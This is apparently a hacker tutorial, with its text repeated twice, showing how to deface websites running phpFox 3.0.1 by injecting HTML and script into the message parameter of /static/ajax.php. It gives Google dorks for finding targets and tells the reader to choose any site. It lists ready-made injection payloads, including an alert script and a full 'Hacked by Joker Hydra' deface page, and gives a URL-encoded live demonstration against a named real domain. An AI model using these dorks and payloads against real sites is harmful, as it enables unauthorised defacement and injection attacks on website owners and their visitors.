Finding Vulnerable Target Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1." "inurl:/stat...
Finding Vulnerable Target
Dork:
"intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"
1- Choose any dork and paste on Google
2- Choose any site
Exploiting Target
1- So, your site would be like this or something similar,
www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc
2- Now, change the error message with your HTML tags or anything you want.
To show Header
<h1>Hacked</h1>
To show header in center
<center><h1>Hacked by Joker Hydra</h1></center>
To show Title
<title>Hacked</title>
To Add a Image
<img src="http://www.jokeranondarkknight.blogspot.com'><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/>
To add a Message
<p><b>Your Message Here<b></p>
To write message in next lines
<p><b>First line<br>Second Line <b></p>
To add a scrolling Text
<marquee>Scrolling text Here</marquee>
To Add a alert box
<script>alert("HACKED!");</script>
To add background colour in page
<body bgcolor="red"/>
To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>Hacked By Joker Hydra!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.jokeranondarkknight.blogspot.com'><marquee><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/></marquee>
3- So it would be like this,
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EHACKED%20By%20Joker%20Hydra!%3C/h2%3E%3Cbr%3E%3Ch1%3EJoker%20Hydra%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png%22/%3E%3C/marquee%3E
Live Demo:
http://artisticdimeinc.com/static/ajax.php?core%5Bajax%5D=true&core%5Bcall%5D=core.message&core%5Bsecurity_token%5D=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=+%3Ctitle%3EHacked%21%3C%2Ftitle%3E%3Cbody+bgcolor%3Dblack%3E%3Ccenter%3E%3Cfont+color%3D%22white%22%3E%3Ch2%3EHACKED+By+Joker+Hydra%21%3C%2Fh2%3E%3Cbr%3E%3Ch1%3EJoker+Hydra+W4S+H3RE%3C%2Fh1%3E%3Ca+href%3D%27http%3A%2F%2Fwww.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg+src%3D%22https%3A%2F%2Flh4.googleusercontent.com%2F-1PbCaCavdVs%2FUzUN2ok8ySI%2FAAAAAAAAAJs%2FzynaD1MHSGE%2Fw346-h260%2FGreyHat.png%22%2F%3E%3C%2Fmarquee%3E
"inurl:/static/ajax.php?core"
1- Choose any dork and paste on Google
2- Choose any site
Exploiting Target
1- So, your site would be like this or something similar,
www.site.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc
2- Now, change the error message with your HTML tags or anything you want.
To show Header
<h1>Hacked</h1>
To show header in center
<center><h1>Hacked by Joker Hydra</h1></center>
To show Title
<title>Hacked</title>
To Add a Image
<img src="http://www.jokeranondarkknight.blogspot.com'><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/>
To add a Message
<p><b>Your Message Here<b></p>
To write message in next lines
<p><b>First line<br>Second Line <b></p>
To add a scrolling Text
<marquee>Scrolling text Here</marquee>
To Add a alert box
<script>alert("HACKED!");</script>
To add background colour in page
<body bgcolor="red"/>
To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>Hacked By Joker Hydra!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href='http://www.jokeranondarkknight.blogspot.com'><marquee><img src="https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png"/></marquee>
3- So it would be like this,
http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EHACKED%20By%20Joker%20Hydra!%3C/h2%3E%3Cbr%3E%3Ch1%3EJoker%20Hydra%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27http://www.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg%20src=%22https://lh4.googleusercontent.com/-1PbCaCavdVs/UzUN2ok8ySI/AAAAAAAAAJs/zynaD1MHSGE/w346-h260/GreyHat.png%22/%3E%3C/marquee%3E
Live Demo:
http://artisticdimeinc.com/static/ajax.php?core%5Bajax%5D=true&core%5Bcall%5D=core.message&core%5Bsecurity_token%5D=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=+%3Ctitle%3EHacked%21%3C%2Ftitle%3E%3Cbody+bgcolor%3Dblack%3E%3Ccenter%3E%3Cfont+color%3D%22white%22%3E%3Ch2%3EHACKED+By+Joker+Hydra%21%3C%2Fh2%3E%3Cbr%3E%3Ch1%3EJoker+Hydra+W4S+H3RE%3C%2Fh1%3E%3Ca+href%3D%27http%3A%2F%2Fwww.jokeranondarkknight.blogspot.com%27%3E%3Cmarquee%3E%3Cimg+src%3D%22https%3A%2F%2Flh4.googleusercontent.com%2F-1PbCaCavdVs%2FUzUN2ok8ySI%2FAAAAAAAAAJs%2FzynaD1MHSGE%2Fw346-h260%2FGreyHat.png%22%2F%3E%3C%2Fmarquee%3E
